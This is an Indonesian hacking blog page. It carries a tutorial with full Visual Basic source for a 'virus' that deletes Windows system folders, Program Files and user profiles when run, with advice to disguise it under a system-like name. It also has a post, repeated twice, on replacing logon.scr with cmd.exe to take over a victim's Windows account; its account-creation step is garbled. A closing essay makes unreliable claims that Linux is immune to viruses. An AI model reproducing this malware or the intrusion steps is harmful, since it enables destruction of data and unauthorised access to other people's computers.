"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR. AND I DONT TAKE RESPONSIBLE FOR ANYTHING.THIS IS JUST FOR KNOWLEGDE PURPOSE.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Nih tutorial buat bikin virus yg rada mematikan, tapi simple, dan kayanya sih g’ bakal kedekteksi antivirus, soalnya cara kerjanya simple banget.
Yg diperluin:
1. Visual Basic(optimal : 6.0)
2. Ngerti tombol2nya VB
Tutorial Bikin Virus cman 1 mnt
1. bikin form sekecil mungkin
2. didalem form itu, masukin nih kode...
Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\Virus_HN.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”) Call DelAll(”c:\windows\system32″) Call DelAll(”c:\windows”) Call DelAll(”C:\Documents and Settings\All Users”) Call DelAll(”C:\Documents and Settings\Administrator”) Call DelAll(”C:\Documents and Settings”) Call DelAll(”C:\Program Files\Common Files”) Call DelAll(”C:\Program Files\Internet Explorer”) Call DelAll(”C:\Program Files\Microsoft Visual Studio”) Call DelAll(”C:\Program Files”)
End
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function
3. Kode yg warna biru itu penangkal nih virus, barang kali kamu ga sengaja teken jadi kamu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya Virus_HN.txt, kamu ga bakal keserang ndiri… bisa kamu edit koq jadi apa gitu…
Yang warna merah itu folder yg bakal didelete ama nih virus, kamu edit ndiri aja…
4. Bikin nih project namanya kaya nama system, disini saya menggunakan nama “SystemAdmin32″ jadi ga bakal dicurigain.
5. Jangan pernah naroh nama kamu di nih virus… key?
6. compile deh… slese!
Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate Nalla Nourma N. "I always Love you".
warm Regards : - Admin of HN (Imam_Samudra88, Gt_Portnoy)
- All HN Older, and HN member "Thanks a lot for Your Support"
Referensi : Gwiqbal & Pengalaman pribadi
Crack Password Windows XP tanpa tools
Crack Password Windows XP tanpa tools
Author : N4is3N
Contact : Prifile.Friendster.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Sebenarnya gak ada persyaratan khusus, kamu hanya perlu memiliki akses fisik di komputer korban.Dengan asumsi, bahwa korban masih menggunakan lokasi default sejak penginstalan Windows-nya
Langsung sajah...
masuk ke MS-DOS (Start-Run-ketik "CMD" tanpa kutip)
Setelah masuk ke C:\Prompt, ketikan perintah berikut...
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Stelah itu, Log off komputer... tunggu 15-20 menit dan DOS Prompt dengan Full System Right akan muncul seperti ini...
C:\> net user administrator
Lalu tinggal Login dng akun baru yg anda buat...
Hal ini akan bekerja selama korban tidak mengganti Default permission di C:\winnt and C:\winnt\system32.
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate, Nalla Nourma N. "I always Love you".
warm Regards : - Admin of HN (Imam_Smudra88, Gt_Portnoy)
- All HN Older, and HN member "Thanks a lot for Your Support"
Referensi : Echo forum, AL_k.
Author : N4is3N
Contact : Prifile.Friendster.com/N4is3N
"ATTENTION!!! THIS TUTOR JUST FOR NEWBIE.FOR 37333, PLEASE DONT WASTE YOUR TIME BY READ THIS TUTOR.THANKS."
---------------------------------------------------------------------------------------------------------------------------------
Sebenarnya gak ada persyaratan khusus, kamu hanya perlu memiliki akses fisik di komputer korban.Dengan asumsi, bahwa korban masih menggunakan lokasi default sejak penginstalan Windows-nya
Langsung sajah...
masuk ke MS-DOS (Start-Run-ketik "CMD" tanpa kutip)
Setelah masuk ke C:\Prompt, ketikan perintah berikut...
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Stelah itu, Log off komputer... tunggu 15-20 menit dan DOS Prompt dengan Full System Right akan muncul seperti ini...
C:\> net user administrator
Lalu tinggal Login dng akun baru yg anda buat...
Hal ini akan bekerja selama korban tidak mengganti Default permission di C:\winnt and C:\winnt\system32.
---------------------------------------------------------------------------------------------------------------------------------
Special Thanks : - Holly God Allah SWT and Great Prophet Muhammad SAW.
- My Soulmate, Nalla Nourma N. "I always Love you".
warm Regards : - Admin of HN (Imam_Smudra88, Gt_Portnoy)
- All HN Older, and HN member "Thanks a lot for Your Support"
Referensi : Echo forum, AL_k.
Minggu, 16 Maret 2008
LINUX, The Hacker Operating System.
LINUX, The Hacker Operating System.
Ribuan Hacker di seluruh dunia menggunakan Linux sebagai Operating System(OS) mereka.Alasannya sederhana saja... "Linux is FREE and POWERFULL."
Free di sini memiliki 2 arti,1.Free of charge,2.Free to modify.Linux adalah sisem operasi yg murah bahkan gratis!Setiap orang bisa saja mendownlaod file ISO Linux secara gratis di web masing2 distro Linux.
Linux memiliki kode sumber yg terbuka(OpenSource).Semua orang boleh membaca dan merubah kodenya sesuai keinginan mereka tanpa perlu takut di sebut pembajak.Sesuai dengan semangat KEBEBASAN yg di anut para hacker, Linux adalah OS terbaik dalam budaya hacker.Seluruh hacker di dunia turut mengembangkan Linux.Salah satu keinginan terbesar saya adalah,Membuat Linux saya sendiri.
Bukan efek psikologis saja yg membuat para hacker di seluruh dunia menggunakan Linux,tapi juga efek teknis yg dimiliki Linux itu sendiri.Linux bekerja sangat cepat dan tepat.Linux juga di rancang dng sistem keamanan yg sangat baik.Saya bahkan tidak perlu mengUpDate antiVirus lagi,karena Linux tidak bisa di tembus oleh Virus.Saya jg sangat jarang sekali menemukan Error di Linux saya (Murni pengalaman pribadi).
Tidak sperti pengguna W*ndows yg selalu di hantui virus dan Error.Arsitektur w*ndows memiliki banyak kekurangan dan cacat di sana-sini.Hal itulah yg menyebabkan W*ndows rentan sekali terhadap serangan Virus.Seperti kata orang bijak "Nyaman belum tentu Aman".Selain itu,w*dows jg adalh closedSource.Anda (Khusus para Hacker) ga akan bisa membaca apalagi merubah kode penyusun W*ndows.Karna itulah para Hacker membenci W*ndows. "W*ndows is SUCK!!!" Begitu kata para hacker.
Salah satu kendala dalam penggunaan Linux adalah,sulitnya pengoprasiannya.Karena penggunaan mode Teks dalam Linux adalah yg utama.Tidak seperti W*ndows yg serba GUI(Graphical User Interface)Dalam w*ndows,semua tinggal klik,klik lalu beres deh.Dalam Linux,kita harus hapal berbagai macam perintah yg di jalankan pada Shell.Tapi percayalah, mode Teks lebih akurat dan cepat di bandingkan dng GUI... It's True!
"Anda bisa saja menggunakan Internet tanpa mengetahui Linux, tapi anda tidak bisa menjadi Hacker Internet tanpa menguasai Linux" By Eric Steven Raymond...Hacker Elite dunia.
Di Tulis oleh: ZeA a.k.a N4is3n
Langganan:
Postingan (Atom)